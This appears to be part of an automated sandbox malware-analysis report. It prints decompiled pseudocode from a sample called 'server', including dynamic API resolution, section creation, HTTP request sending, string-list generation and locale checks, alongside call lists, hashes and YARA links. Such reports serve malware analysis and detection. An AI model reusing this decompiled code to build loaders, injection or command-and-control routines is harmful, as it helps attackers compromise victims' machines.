            0x007e66ca
            0x007e66d4
            0x007e66da
            0x007e66dc
            0x007e66f3
            0x007e66f7
            0x007e66fa
            0x007e66ff
            0x007e66ff
            0x007e6708
            0x007e670c
            0x007e670f
            0x007e6714
            0x007e6714
            0x007e670c
            0x007e6717
            0x007e671c
            0x007e6722

            APIs
              • Part of subcall function 007E5815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,007E668E,253D7325,00000000,00000000,?,7491C740,007E3ECE), ref: 007E587C
              • Part of subcall function 007E5815: sprintf.NTDLL ref: 007E589D
            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A0
            • lstrlen.KERNEL32(00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A8
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • strcpy.NTDLL ref: 007E66BF
            • lstrcat.KERNEL32(00000000,00000000), ref: 007E66CA
              • Part of subcall function 007E5063: lstrlen.KERNEL32(00000000,00000000,007E3ECE,00000000,?,007E66D9,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E5074
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66E7
              • Part of subcall function 007E4AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,007E66F3,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E4AD1
              • Part of subcall function 007E4AC7: _snprintf.NTDLL ref: 007E4B2F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
            • String ID: =
            • API String ID: 2864389247-1428090586
            • Opcode ID: 28bcd27b4461981bc119159c6fcaaf1639d9f0bc123ad01b76f6c6ba3b56ede4
            • Instruction ID: dc5ce1c9939681cd9c6d1689ae0d002b27416b05f9fc229f6184e472e4bb09b7
            • Opcode Fuzzy Hash: 28bcd27b4461981bc119159c6fcaaf1639d9f0bc123ad01b76f6c6ba3b56ede4
            • Instruction Fuzzy Hash: 1411CA739035A9B78612BB769CC9C6F37AD9E5D7A83054016FA04AB203DE7CDD0247E1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401202 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 425 401202-401214 call 4012e6 428 4012d5 425->428 429 40121a-40124f GetModuleHandleA GetProcAddress 425->429 432 4012dc-4012e3 428->432 430 401251-401265 GetProcAddress 429->430 431 4012cd-4012d3 call 401ba9 429->431 430->431 433 401267-40127b GetProcAddress 430->433 431->432 433->431 435 40127d-401291 GetProcAddress 433->435 435->431 437 401293-4012a7 GetProcAddress 435->437 437->431 438 4012a9-4012ba call 40110b 437->438 440 4012bf-4012c4 438->440 440->431 441 4012c6-4012cb 440->441 441->432
            C-Code - Quality: 100%
            			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E004012E6(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00401BA9(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E0040110B(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












            0x00401210
            0x00401214
            0x004012d5
            0x0040121a
            0x00401232
            0x00401241
            0x00401248
            0x0040124a
            0x0040124f
            0x004012cd
            0x004012ce
            0x00401251
            0x0040125e
            0x00401260
            0x00401265
            0x00000000
            0x00401267
            0x00401274
            0x00401276
            0x0040127b
            0x00000000
            0x0040127d
            0x0040128a
            0x0040128c
            0x00401291
            0x00000000
            0x00401293
            0x004012a0
            0x004012a2
            0x004012a7
            0x00000000
            0x004012a9
            0x004012af
            0x004012b5
            0x004012ba
            0x004012bf
            0x004012c4
            0x00000000
            0x004012c6
            0x004012c9
            0x004012c9
            0x004012c4
            0x004012a7
            0x00401291
            0x0040127b
            0x00401265
            0x0040124f
            0x004012e3

            APIs
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
            • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
            • String ID:
            • API String ID: 3012371009-0
            • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
            • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E51D8 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E51D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E007E2058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E007E7B83(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







            0x007e51d8
            0x007e51e5
            0x007e51e7
            0x007e524a
            0x00000000
            0x007e524a
            0x007e51ff
            0x007e5206
            0x007e5212
            0x007e5217
            0x007e522d
            0x007e523d
            0x00000000
            0x007e522f
            0x007e522f
            0x007e5236
            0x007e5243
            0x007e5243
            0x007e5243
            0x007e5236
            0x007e522d
            0x007e5248
            0x00000000
            0x00000000
            0x007e524e

            APIs
            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,007E21E7,?,?,74CF81D0,00000000), ref: 007E5212
            • ResetEvent.KERNEL32(?), ref: 007E5217
            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 007E5224
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,007E3F34,00000000,?,?), ref: 007E522F
            • GetLastError.KERNEL32(?,?,00000102,007E21E7,?,?,74CF81D0,00000000), ref: 007E524A
              • Part of subcall function 007E2058: lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,007E51F7,?,?,?,?,00000102,007E21E7,?,?,74CF81D0), ref: 007E2064
              • Part of subcall function 007E2058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,007E51F7,?,?,?,?,00000102,007E21E7,?), ref: 007E20C2
              • Part of subcall function 007E2058: lstrcpy.KERNEL32(00000000,00000000), ref: 007E20D2
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,007E3F34,00000000,?), ref: 007E523D
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
            • String ID:
            • API String ID: 3739416942-0
            • Opcode ID: d6e54678f705394328db5237a14eaa474080096e6df17110d404a762737cd1e0
            • Instruction ID: ba5d52c1bcba2764330716499302cf556c9211ea419e0e44ccd3a4f16672fd61
            • Opcode Fuzzy Hash: d6e54678f705394328db5237a14eaa474080096e6df17110d404a762737cd1e0
            • Instruction Fuzzy Hash: A501AD71102A85AADB306B32DC88F1B77A9BF5C328F104A28F691D10E0D728E804DA24
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E2523 Relevance: 7.7, APIs: 5, Instructions: 161memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 59%
            			E007E2523(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E007E4520();
				if(_t21 != 0) {
					_t60 =  *0x7ea2fc; // 0x2000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x7ea2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x7ea178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E007E3037( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x7ea348; // 0x272d5a8
					if( *0x7ea2fc > 5) {
						_t8 = _t26 + 0x7eb51d; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x7eb9db; // 0x44283a44
						_t27 = _t7;
					}
					E007E4332(_t27, _t27);
					_t31 = E007E415A(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E007E27A0();
						 *0x7ea310 =  *0x7ea310 ^ 0x81bbe65d;
						 *0x7ea36c = _t32;
						_t33 = E007E33DC(0x60);
						 *0x7ea3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x7ea3cc; // 0x2f19600
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x7ea3cc; // 0x2f19600
							 *_t52 = 0x7eb142;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x7ea2d8, 0, 0x43);
							 *0x7ea368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x7ea2fc; // 0x2000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x7ea348; // 0x272d5a8
								_t13 = _t59 + 0x7eb74a; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x7e927b);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E007E3BD3( ~_v8 &  *0x7ea310, 0x7ea00c); // executed
								_t43 = E007E1D8A(0, _t56, _t62, _t64, 0x7ea00c); // executed
								_t55 = _t43;
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E007E6EA3(_t62); // executed
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E007E6815(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E007E5C31(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x7ea17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E007E23C4(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}
































            0x007e2523
            0x007e252d
            0x007e2530
            0x007e2533
            0x007e2536
            0x007e253d
            0x007e253f
            0x007e254b
            0x007e254d
            0x007e254d
            0x007e2556
            0x007e255c
            0x007e2561
            0x007e257b
            0x007e2587
            0x007e2589
            0x007e258e
            0x007e2598
            0x007e2598
            0x007e2590
            0x007e2590
            0x007e2590
            0x007e2590
            0x007e259f
            0x007e25ac
            0x007e25b3
            0x007e25b8
            0x007e25b8
            0x007e25c1
            0x007e25c4
            0x007e25ea
            0x007e25ef
            0x007e25fb
            0x007e2600
            0x007e2605
            0x007e260a
            0x007e260c
            0x007e2638
            0x007e263a
            0x007e260e
            0x007e2612
            0x007e2617
            0x007e261c
            0x007e2623
            0x007e2629
            0x007e262e
            0x007e2634
            0x007e263b
            0x007e263d
            0x007e263f
            0x007e264e
            0x007e2654
            0x007e2659
            0x007e265b
            0x007e268b
            0x007e268d
            0x007e265d
            0x007e265d
            0x007e2663
            0x007e2670
            0x007e2676
            0x007e2676
            0x007e267e
            0x007e2687
            0x007e268e
            0x007e2690
            0x007e2692
            0x007e2699
            0x007e26a6
            0x007e26ab
            0x007e26b0
            0x007e26b2
            0x007e26b4
            0x00000000
            0x00000000
            0x007e26b6
            0x007e26bb
            0x007e26bd
            0x007e26c4
            0x007e26c8
            0x007e26cb
            0x007e26e0
            0x007e26e4
            0x007e26e9
            0x00000000
            0x007e26e9
            0x007e26cd
            0x007e26cf
            0x00000000
            0x00000000
            0x007e26da
            0x007e26dc
            0x007e26de
            0x00000000
            0x00000000
            0x00000000
            0x007e26de
            0x007e26c1
            0x007e26c1
            0x007e2692
            0x007e25c6
            0x007e25c6
            0x007e25cb
            0x007e26eb
            0x007e26f0
            0x007e26f8
            0x007e26f8
            0x00000000
            0x007e26f0
            0x007e25d1
            0x007e25d4
            0x007e25de
            0x007e25e5
            0x00000000
            0x007e2700
            0x007e2700
            0x007e2703
            0x007e2707
            0x007e2707

            APIs
              • Part of subcall function 007E4520: GetModuleHandleA.KERNEL32(4C44544E,00000000,007E253B,00000001), ref: 007E452F
            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 007E25B8
              • Part of subcall function 007E27A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 007E27C4
              • Part of subcall function 007E27A0: wsprintfA.USER32 ref: 007E2828
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • memset.NTDLL ref: 007E2612
            • RtlInitializeCriticalSection.NTDLL(02F195C0), ref: 007E2623
              • Part of subcall function 007E5C31: memset.NTDLL ref: 007E5C4B
              • Part of subcall function 007E5C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 007E5C91
              • Part of subcall function 007E5C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 007E5C9C
            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 007E264E
            • wsprintfA.USER32 ref: 007E267E
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
            • String ID:
            • API String ID: 1825273115-0
            • Opcode ID: b73d71aa9abcc371e876bdbd60a462bd64b30fadfb6c701395c9860029788b50
            • Instruction ID: a8042a584fd200b7d637d89c3dc1cc2f40e089e99f82f2a762615fcef86b7958
            • Opcode Fuzzy Hash: b73d71aa9abcc371e876bdbd60a462bd64b30fadfb6c701395c9860029788b50
            • Instruction Fuzzy Hash: 5F511771A03295FBDB10ABA6DC89F6E37ACBB0C700F104556F202EB152D77DAA428B55
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E7040 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
            Download Yara Rule
            C-Code - Quality: 22%
            			E007E7040(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E007E33DC(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E007E61DA(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E007E33DC((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x7ea318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















            0x007e7047
            0x007e704e
            0x007e7053
            0x007e7056
            0x007e705d
            0x007e7060
            0x007e7063
            0x007e7068
            0x007e706d
            0x007e71c1
            0x007e71c3
            0x007e71c5
            0x007e71ca
            0x007e71ca
            0x007e7073
            0x007e7076
            0x007e7079
            0x007e707b
            0x007e707b
            0x007e707f
            0x00000000
            0x00000000
            0x007e7083
            0x007e70af
            0x007e70b4
            0x007e70b6
            0x007e70b6
            0x007e70b9
            0x007e70bc
            0x007e70bc
            0x007e70be
            0x00000000
            0x007e7089
            0x007e708b
            0x007e70aa
            0x007e70aa
            0x007e70c1
            0x007e70c1
            0x007e70c2
            0x007e70c2
            0x007e70c5
            0x00000000
            0x00000000
            0x00000000
            0x007e70c5
            0x007e708f
            0x007e70d6
            0x007e70da
            0x007e71b4
            0x007e71b6
            0x007e71b6
            0x007e71b7
            0x007e71ba
            0x00000000
            0x007e71ba
            0x007e70e3
            0x007e70f4
            0x007e70f8
            0x007e71b0
            0x00000000
            0x007e71b0
            0x007e70fe
            0x007e7101
            0x007e7105
            0x007e7109
            0x007e710e
            0x007e71a6
            0x007e71a6
            0x00000000
            0x007e71ac
            0x007e7119
            0x007e7122
            0x007e7136
            0x007e713d
            0x007e7152
            0x007e7158
            0x007e7160
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x007e7162
            0x007e7162
            0x007e7162
            0x007e7169
            0x007e7171
            0x00000000
            0x00000000
            0x007e7173
            0x007e717c
            0x00000000
            0x00000000
            0x00000000
            0x007e717e
            0x007e7180
            0x007e7183
            0x007e7183
            0x007e7186
            0x007e718a
            0x007e718d
            0x007e7193
            0x007e7196
            0x007e719d
            0x00000000
            0x007e7119
            0x007e7094
            0x007e709c
            0x007e70a2
            0x007e70a4
            0x007e70a4
            0x007e70a7
            0x007e70a9
            0x00000000
            0x007e70a9
            0x007e7083
            0x007e70c9
            0x007e70ce
            0x007e70d0
            0x007e70d0
            0x007e70d3
            0x007e70d3
            0x00000000

            APIs
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • lstrcpy.KERNEL32(43175AC4,00000020), ref: 007E713D
            • lstrcat.KERNEL32(43175AC4,00000020), ref: 007E7152
            • lstrcmp.KERNEL32(00000000,43175AC4), ref: 007E7169
            • lstrlen.KERNEL32(43175AC4), ref: 007E718D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
            • String ID:
            • API String ID: 3214092121-3916222277
            • Opcode ID: 78b5544cb55d854b6ea54cbe4359c8ec1909136f4df0ad3cfdf597013bd69910
            • Instruction ID: 53f70a672888b8a39cf668aae509daef712e8031e11c926e3049c14fb280d86d
            • Opcode Fuzzy Hash: 78b5544cb55d854b6ea54cbe4359c8ec1909136f4df0ad3cfdf597013bd69910
            • Instruction Fuzzy Hash: 8B51B331A0624CEFDF19DF9AC8847ADBBB6FF89354F14805AE8159B211C7789A41CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401DE1 Relevance: 7.5, APIs: 5, Instructions: 19memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x404160 = _t1;
				if(_t1 != 0) {
					 *0x404170 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E004019F1(); // executed
					_t6 = _t4;
					HeapDestroy( *0x404160);
				}
				ExitProcess(_t6);
			}






            0x00401de2
            0x00401deb
            0x00401df1
            0x00401df8
            0x00401e01
            0x00401e06
            0x00401e0c
            0x00401e17
            0x00401e19
            0x00401e19
            0x00401e20

            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
            • GetCommandLineW.KERNEL32 ref: 00401E06
              • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
              • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
              • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
              • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
              • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • HeapDestroy.KERNEL32 ref: 00401E19
            • ExitProcess.KERNEL32 ref: 00401E20
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
            • String ID:
            • API String ID: 1863574965-0
